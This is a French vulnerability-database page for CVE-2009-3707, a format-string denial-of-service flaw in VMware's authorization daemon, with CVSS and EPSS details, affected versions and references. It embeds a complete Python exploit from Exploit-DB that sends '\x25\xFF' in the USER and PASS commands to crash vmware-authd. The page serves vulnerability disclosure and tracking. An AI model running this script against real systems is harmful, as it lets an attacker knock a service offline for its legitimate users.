CVE-2009-3707 : Détail

CVE-2009-3707

38.03%V3
Network
2009-10-16
14h00 +00:00
2010-04-14
07h00 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

VMware Authentication Daemon 1.0 in vmware-authd.exe in the VMware Authorization Service in VMware Workstation 7.0 before 7.0.1 build 227600 and 6.5.x before 6.5.4 build 246459, VMware Player 3.0 before 3.0.1 build 227600 and 2.5.x before 2.5.4 build 246459, VMware ACE 2.6 before 2.6.1 build 227600 and 2.5.x before 2.5.4 build 246459, and VMware Server 2.x allows remote attackers to cause a denial of service (process crash) via a \x25\xFF sequence in the USER and PASS commands, related to a "format string DoS" issue. NOTE: some of these details are obtained from third party information.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-134 Use of Externally-Controlled Format String
The product uses a function that accepts a format string as an argument, but the format string originates from an external source.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 33271

Date de publication : 2009-10-06 22h00 +00:00
Auteur : shinnai
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/36630/info VMware Player and Workstation are prone to a remote denial-of-service vulnerability because the applications fail to perform adequate validation checks on user-supplied input. An attacker can exploit this issue to crash the 'vmware-authd' process, denying service to legitimate users. NOTE: This issue was also covered in BID 39345 (VMware Hosted Products VMSA-2010-0007 Multiple Remote and Local Vulnerabilities); this BID is being retained to properly document the issue. # ---------------------------------------------------------------------------- # VMware Authorization Service <= 2.5.3 (vmware-authd.exe) Format String DoS # url: http://www.vmware.com/ # # author: shinnai # mail: shinnai[at]autistici[dot]org # site: http://www.shinnai.net # # This was written for educational purpose. Use it at your own risk. # Author will be not responsible for any damage. # # Tested on Windows XP Professional Ita SP3 full patched # ---------------------------------------------------------------------------- # usage: C:\>exploit.py 127.0.0.1 912 import socket import time import sys host = str(sys.argv[1]) port = int(sys.argv[2]) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: conn = s.connect((host, port)) d = s.recv(1024) print "Server <- " + d s.send('USER \x25\xFF \r\n') print 'Sending command "USER" + evil string...' d = s.recv(1024) print "Server response <- " + d s.send('PASS \x25\xFF \r\n') print 'Sending command "PASS" + evil string...' try: d = s.recv(1024) print "Server response <- " + d except: print "\nExploit completed..." except: print "Something goes wrong honey..."

Products Mentioned

Configuraton 0

Vmware>>Ace >> Version 2.5.0

    Vmware>>Ace >> Version 2.5.1

      Vmware>>Ace >> Version 2.5.2

        Vmware>>Ace >> Version 2.5.3

          Vmware>>Ace >> Version 2.5.4

            Vmware>>Ace >> Version 2.6

            Vmware>>Ace >> Version 2.6.1

              Vmware>>Player >> Version 2.5

              Vmware>>Player >> Version 2.5.1

              Vmware>>Player >> Version 2.5.2

              Vmware>>Player >> Version 2.5.3

              Vmware>>Player >> Version 2.5.4

              Vmware>>Player >> Version 3.0

              Vmware>>Player >> Version 3.0.1

              Vmware>>Server >> Version 2.0.0

              Vmware>>Server >> Version 2.0.1

              Vmware>>Server >> Version 2.0.2

              Vmware>>Workstation >> Version 6.5.0

              Vmware>>Workstation >> Version 6.5.1

              Vmware>>Workstation >> Version 6.5.2

              Vmware>>Workstation >> Version 6.5.3

              Vmware>>Workstation >> Version 6.5.4

              Vmware>>Workstation >> Version 7.0

              Vmware>>Workstation >> Version 7.0.1

              Références

              http://security.gentoo.org/glsa/glsa-201209-25.xml
              Tags : vendor-advisory, x_refsource_GENTOO
              http://secunia.com/advisories/39206
              Tags : third-party-advisory, x_refsource_SECUNIA
              http://www.securityfocus.com/bid/36630
              Tags : vdb-entry, x_refsource_BID
              http://securitytracker.com/id?1022997
              Tags : vdb-entry, x_refsource_SECTRACK
              http://secunia.com/advisories/36988
              Tags : third-party-advisory, x_refsource_SECUNIA
              http://secunia.com/advisories/39215
              Tags : third-party-advisory, x_refsource_SECUNIA